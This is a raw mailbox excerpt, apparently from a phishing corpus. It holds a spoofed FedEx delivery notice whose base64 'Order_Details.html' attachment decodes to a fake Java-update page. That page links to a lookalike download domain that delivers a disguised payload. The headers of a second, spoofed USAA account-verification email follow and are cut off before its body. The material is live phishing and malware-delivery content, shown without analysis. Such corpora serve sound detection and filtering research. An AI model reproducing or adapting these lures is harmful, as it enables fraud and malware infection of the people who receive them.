From: "Fedex"<fedex@E.delivery.com>
Subject: Package delivery
Date: Tue, 3 May 2016 20:50:05 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_011D_01C2A9A6.39E351E2"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 198

This is a multi-part message in MIME format.

------=_NextPart_000_011D_01C2A9A6.39E351E2
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {color: #000000}
-->
</style>
</head>

<body>
<div class="TabSelected" id="mpfmgdytawzgr5RGDLwAkgYin4A2_hmlvControl_03"><div id="mpfmgdytawzgr5RGDLwAkgYin4A2_hmlvControl_03_package" class="PackageTracking" t="Where's your package?"><div class="FloatRight">
  <p><img src="https://a.gfx.ms/fedex_logo.png" border="0"></p>
  <p>&nbsp;</p>
</div>
<div>
<div class="TrackingNumber" style="color: #650198">
  <p><span class="style1">Tracking:</span> 784057331503</p>
  </div>
<div class="TrackingDataBlock">
  <p class="TrackingLabel">You have a package coming in a couple of days. </p>
  </div>
<div class="TrackingDataBlock Status">
  <p class="TrackingDataBlock"><span class="TrackingLabel">Scheduled Delivery Date:</span><span class="TrackingData"> May 7, 2016</span></p>
  </div>
</div>
<div class="TrackingFooter"> Shipping Address: Please view attached file to reconfirm shipping address to receive package<a href="&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;">.</a> </div>
<div id="mpfmgdytawzgr5RGDLwAkgYin4A2_hmlvControl_03_package_popoverContent" style="display: none"></div></div></div>
</body>
</html>

------=_NextPart_000_011D_01C2A9A6.39E351E2
Content-Type: application/octet-stream;
	name="Order_Details.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="Order_Details.html"

PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAg
VHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1s
MS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9
Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQo8bWV0
YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRt
bDsgY2hhcnNldD1pc28tODg1OS0xIiAvPg0KPHRpdGxlPk9yZGVyIGRldGFp
bHM8L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCjxwIGFsaWduPSJjZW50
ZXIiPjxhIGhyZWY9Imh0dHA6Ly9kb3dubG9hZC5qYXZhLmNvbS5pZGZ5LnRy
YW5jcmVhdGl2ZS5uZXQvamF2YS5jb20vZW4vZG93bmxvYWQvIj48aW1nIHNy
Yz0iLi4vcGx1Z24uanBnIiB3aWR0aD0iNDgyIiBoZWlnaHQ9IjQwMiIgYm9y
ZGVyPSIwIiAvPjwvYT48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj5Zb3UgbXVz
dCB1cGRhdGUgdG8gdGhlIGxhdGVzdCB2ZXJzaW9uIG9mIEphdmEgdG8gdmll
dyB0aGlzIGltYWdlLiA8L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48YSBocmVm
PSJodHRwOi8vZG93bmxvYWQuamF2YS5jb20uaWRmeS50cmFuY3JlYXRpdmUu
bmV0L2phdmEuY29tL2VuL2Rvd25sb2FkLyI+Q2xpY2sgaGVyZTwvYT4gdG8g
dXBkYXRlIHlvdXIgamF2YSB2ZXJzaW9uIDwvcD4NCjwvYm9keT4NCjwvaHRt
bD4NCg==

------=_NextPart_000_011D_01C2A9A6.39E351E2--

From jose@monkey.org Wed May  4 21:32:57 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71478659994.08.page04_53ce81534593f
X-Spam-Summary: 40,2.5,0,48c7cf34dcf8747f,d41d8cd98f00b204,codewizard@approject.com,:codewizard@approject.com,RULES_HIT:1:41:72:355:379:455:581:800:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1518:1575:1588:1592:1594:1685:1730:1744:1777:1792:2067:2069:2070:2194:2196:2198:2199:2200:2201:2525:2527:2568:2610:2612:2636:2682:2685:2731:2737:2741:2859:2890:2891:2894:2901:2903:2909:2916:2920:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:2975:2976:3000:3022:3138:3139:3140:3141:3142:3148:3154:3352:3866:3867:3868:3870:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4605:4700:5007:6117:6248:6650:6669:6678:6687:7208:7809:7903:8516:8518:8550:8568:8599:8603:8784:8957:9025:9060:9080:9121:9130:9149:9177:9388:9416:9908:10004:10030:10049:10113:10128:10346:10946:11026:11233:11473:11529:11658:11914:12043:12438:12477:12555:12561:12679:12729:12737:12740:12776:12812:12963:12973:13038:13110:13113
X-HE-Tag: page04_53ce81534593f
X-Filterd-Recvd-Size: 14110
Received: from ACCCVM02.acccshawano.local (66-191-122-218.static.eucl.wi.charter.com [66.191.122.218])
	by imf05.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  4 May 2016 21:32:55 +0000 (UTC)
Received: from ACCCVM02.acccshawano.local ([127.0.0.1]) by ACCCVM02.acccshawano.local with Microsoft SMTPSVC(8.0.9200.16384);
	 Wed, 4 May 2016 16:32:50 -0500
Content-Type: multipart/alternative; boundary="===============0725724113=="
MIME-Version: 1.0
Subject: Your USAA Checking/Savings Account Verification Notice
To: Recipients <codewizard@approject.com>
